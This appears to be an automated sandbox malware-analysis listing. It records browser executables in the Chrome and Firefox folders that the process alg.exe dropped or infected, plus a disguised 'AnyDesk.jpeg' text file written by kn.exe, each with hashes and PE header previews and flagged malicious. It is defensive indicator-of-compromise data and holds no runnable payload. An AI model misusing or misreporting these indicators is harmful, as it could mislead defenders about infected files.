                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......)K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.953589517618238
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:NtjqL8fH+8aUbp8D/8+xQWAasqjnhMgeiCl7G0nehbGZpbD:fjKK+81FI/854Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E1A349B2CFACB5B8484B7F18818719BD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:739F14CE6B39BA7C9BC648DA55DCCFC3FE291054
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:44A12D30E29FDF8D5A2285FBB4B70DE34A60DCE6C9C68CBE87CCD3B6F51B2F38
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B66A387F5D65152F7ABE3AC19CFBC67DD3693773056B3B503465DC5962063DAA80A52CA5A659520278D7409BA7F6484486737E06C32991934D25976467B6B127
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......y!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.032396185409379
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:uAMsOu3JfCIGnZuTodRFYKBrFxbWpeDmg27RnWGj:uAMa38ZuTSJD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C0A04222C50D653C945ACC62986B1D8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8913E0512F0C6A68EA19F417371CA0AE9027EDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D7AC6A157C65CFB01D5012E5167B064B680A9051DBC4882C3346F1E088BC3979
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5F3C92349397DD0CD1E987E66344511B706AD6C6520DB607F0F7BEB5617121401A72BF3AC420E37B4EBE9DFE01639449F7DF027C2060BD1555B7848CA45A1B9B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......1$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.104354487066112
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:uwbK7tnhD4aH6wD2Krx5NgOOagtE8FCsqjnhMgeiCl7G0nehbGZpbD:uSK7Fhslq2EPfOfEvDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4F1310F1877571CE150B787AC5EF81C3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:86B88FA61E9AD9F67EA9A3F89213463F53454B40
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E8B4DAB6526696816146A8C5666AE238F74A8EE6B4C22C80A52C71536909B240
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E1E1EA52E23201B39AFAE4DE3A7D008E87DA5466D928B7EE4D3B171D4BDC859FE9309AD889E88D601A7CA866A3D687C1CEE400D0E6DFAEB8118616ADD6AC6FFA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................G}.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.158083091997089
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:7KI7Twj5KDHxJ1FxyD+/wsG1TbbcCsqjnhMgeiCl7G0nehbGZpbD:7v7e0j31mD+/wDfbpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D084AE6233FBEF5A9FB25540814D143C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9AAD226B90244C7632C0F76C24BBD347BB4D6B3C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:15286D78B53F7DB499CDD78EFC8CED286D5807011F7DC57D94751F2C6F5E13E3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5E6087717100B07A8C443DF27B8F6992E2CF074399A2371662F65ADF124195A2456243184F6037EFACE373405B4A658F4A548DF38B4E538A5D82E2AA35E59051
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.377434153137148
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:qQUVPDHhSRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:9yhSRsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF134AEDB37E13BB92ACE6E1D1BBA2E3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E29C94C9A6B82808C6AADDD6B819D506BE97147E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:13A9C6192266AB67EE1D2054184287C81D31A54695CE5DB84C75FC20CA48DBEF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BED1FD7993AFD390F8DC30F5CBFFE17772B72D10DA7F5BFDC009C8B841ADB322396E2500AE70820187603A8B7340FC21374D702D73714C1869B0EA231DDE2FCA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p............ ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.222124022720567
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:xsFfc1VyFn5UQn652bO4HKsqjnhMgeiCl7G0nehbGZpbD:xsFcIn5rJoDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3E53C60E7F0265011CABF5DEF87FC0A0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A1EAED8817FD911A6060E2C6E9CEDC7FDB2895F6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E827A8B2F8D34B39F6FEDA6D83F37C7D0FEC3223F60EB2BE35897AE8A2C6E1EB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D18168F9DD7B63F4C53619979B366EDF6642D5DC2475BFE80B01F906B3E07055F985D6EA3E21CE3C6E2E10CC2AFDCD45E461915AD454B1E66695D8C75645C8CA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.494289177093508
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:jt9o6p4xQbiKI69wpemIwpel9FsqjnhMgeiCl7G0nehbGZpbD:jt9faQbtl2peapelbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:982308B395280AF06BC46630B8DC127F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:93400962F5605E871DEB1211B57EB5C9BD4E0D08
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:03789DEA7BB90ED0621EC0BB4B31F7443619F575A6EAB96679FE5C2129D73457
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4FF30A70E5A5A98B6A45DFE72F3B7191AA06E298C4999AE7E7FC6FD182F938E28EAE9DB48DF68FB84CB423324041FD82023EAD81AFC45F9FB310A0344A15CE4E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................N.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.347849761549814
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:4QVTZu0JSsqjnhMgeiCl7G0nehbGZpbD:3VTZurDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9AC1B93FAE4F9A57BE493FC216923D05
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AC04DDB51B0F7A5CC89663AFB6DB0DF7D24293DC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9351E984C5C64CACD419E31FD21C7638668F0C1EFE6BC12E8B11C89A242A961D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1842F5C5F21DC620BE82B064A477204B5E0D2D014A188EC472D70F0229B9EB614184D8D84E19AEC38BC1BE96AED9E0D32AF84428E369C3B5FBF7A540479CE7C0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......kv.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.808382778321267
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:LC1vpgXcZHzMsqjnhMgeiCl7G0nehbGZpbD:LC1vpIcN4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC083C4C6A79DECDF1961A9BAD5C8FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5C04F1A01B6A3C49C36DA84A3C77AED6B43A9AD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8408588576981A92177E12004451914C716CCE1B07600E58C7E55B19112B4CC9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D135A312F3E46899E7D2B16B8377E3A57D8E0D3573BF6DE8A5661B253F9D17E6295E8DA3171A8D688A4EA4772CE47878093A8E80328C098630D8B0FD7C9B90D5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.....................................}.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.140042067424111
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:qSwjQXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qvQsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:59BAE5AF7AC3AAC8CADB9C9906EEFC7E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1FA376CA5DD8DE9B5E54E4EC191AD658BF03BCDA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:140F27706CA18EFF20A2A238CA57331D221FBF32488706E498FFDCBEC81CAABE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:002438FADE0E1A45A37A7897A3CDCAD248DFC7BCF3EA4AC4743620BDF1F614B99B30C3476200FC882DF7A44892E5B1A27E55997F96E4EA96B41E3A57F1259AA5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................v..... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441174599903948
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:PWKntIfGpCsqjnhMgeiCl7G0nehbGZpbD:u8IeADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DD1D7A4A9DD65BD14BE6CFBA4C3E242D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:001A9136922FE6A947B2E6E3197EFC282200AFD9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A3E685042A6908ADAFC55FB70D5DE155F8309A3827E1D3F7839ADD1DA4C801B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7803F3BACB14A9A7F7896085F84FCC2FF0DADBEACA5B018C92DFFEF7C03B5D986BA7767328A16D6D81551A332CBD585EFA822EF922FFF259FBFE02BC09C5E21C
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1033029375397
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:1IhEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D631FA2156162FB80245634719409624
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F1BCCF0649001C1DBDF8F91AFEDB13DCE4092A73
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E912E2EAD8142FA8408063BBA815177813DBD5102D3E6BE574E4B74ABAF0D420
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4839854012C2A8410574B1CA84496DD2E7C9B5FF15E47E80FE02E32FF509C7005A7AE854730E519369F55486D3192B98B11E960F97B82502E2BE8BA0E60AA248
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................w..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.421217604990358
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:s8oREwt2ioQ3J+R1sqjnhMgeiCl7G0nehbGZpbD:s8oRpoFpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2CE6205186B8ED216F01B11A4CB92ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:296A6CE708F9CACE1DDBC66EE838D1806DE531D3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EB6DEAEEB202DA204C1BBB1F7ECBDD1CC3F38A1DC9F6FDB6C30F1438ECF4CE51
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2B23AFC906C16963820D3FE8989E8C94F1656133598524BB97088A11DA275B08D0589ADB36B00AE042988D8E16BE6B75ACE05B93378D865CA71AE0AE8AD5AB55
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................I..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\AnyDesk.jpeg

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2452482
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.685285557765028
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hgOlTs4SJ+BGgNxe63T3vTmhKA8RZegxG:Q
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:04AD7E38AA2F399B5862E6267697632A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A30E9C94BB215F0B96A651432F8F74F4A06284DE
